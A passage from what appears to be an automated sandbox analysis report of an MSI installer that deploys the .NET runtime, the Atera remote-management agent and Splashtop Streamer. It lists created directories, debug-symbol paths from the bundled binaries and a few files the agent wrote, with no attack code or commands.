                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.CoreLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\host
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\host\fxr
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\host\fxr\6.0.35
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\dotnet.exe
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\LICENSE.txt
                                Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\dotnet\ThirdPartyNotices.txt
                                Source: Arquivo_4593167.msi; Static file information: File size 2994176 > 1048576
                                Source: Binary string: System.Threading.Tasks.Dataflow.ni.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Primitives\net6.0-Release\System.IO.FileSystem.Primitives.pdb source: System.IO.FileSystem.Primitives.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdb source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdb source: SRUsb.exe.1.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdb source: LiteDB.dll.24.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Cng\net6.0-windows-Release\System.Security.Cryptography.Cng.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: NLog.dll.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.IsolatedStorage\net6.0-windows-Release\System.IO.IsolatedStorage.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdbSHA256 source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdb source: xdnup.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdbH source: SRUsb.exe.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.Common\net6.0-Release\System.Data.Common.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Private.CoreLib.ni.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: NLog.dll.24.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdb source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000024.00000002.2593578356.000000000042E000.00000002.00000001.01000000.0000001B.sdmp, SplashtopStreamer.exe, 00000024.00000000.2186291125.000000000042E000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdbSHA256 source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: System.IO.IsolatedStorage.ni.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdbt+ source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\PreVerCheck.pdb source: PreVerCheck.exe, 00000025.00000000.2215637852.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp, PreVerCheck.exe, 00000025.00000002.2561997635.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdbSHA256 source: LiteDB.dll.24.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdbh source: xdnup.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Arquivo_4593167.msi
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdb source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\Src\Runtime\InstallScript\ISBEW64\x64\Release\ISBEW64.pdb source: _isA1FD.exe, 00000028.00000000.2252067091.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000028.00000002.2255085096.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000002.2256104339.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000029.00000000.2252661620.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000000.2253370724.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002A.00000002.2256268057.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000002.2258725000.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002B.00000000.2255045633.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000000.2255937185.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002C.00000002.2259881834.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000002.2289803250.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002D.00000000.2257963587.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000002.2262306546.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002E.00000000.2259356144.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000002.2262839005.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 0000002F.00000000.2260351966.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000002.2265092670.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000030.00000000.2261419648.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 
00000031.00000002.2267141038.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp, _isA1FD.exe, 00000031.00000000.2262303471.00007FF6279E7000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit\net6.0-Release\System.Reflection.Emit.pdb source: System.Reflection.Emit.dll.1.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: W.pdb$Gs0 source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/net6.0-Release/System.Private.DataContractSerialization.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll1.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                                Source: Binary string: System.Security.Cryptography.Cng.ni.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\net6.0-windows-Release\Microsoft.CSharp.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdbSHA256~f source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1792642291.000001C5E59A2000.00000002.00000001.01000000.00000011.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Arquivo_4593167.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdbRSDS source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Data.Common.ni.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
                                Source: Binary string: c:\winddk\7600.16385.1\src\setup\difxapi\difxcmd\objfre_win7_x86\i386\DIFxCmd.pdb source: DIFxCmd.exe.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdbSHA256 source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: System.Reflection.DispatchProxy.dll.1.drStatic PE information: 0xD237EF3C [Sun Oct 5 09:11:24 2081 UTC]
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004214F2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,36_2_004214F2
                                Source: System.Linq.dll.1.drStatic PE information: section name: .text entropy: 6.8378154934993045

                                Persistence and Installation Behavior

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
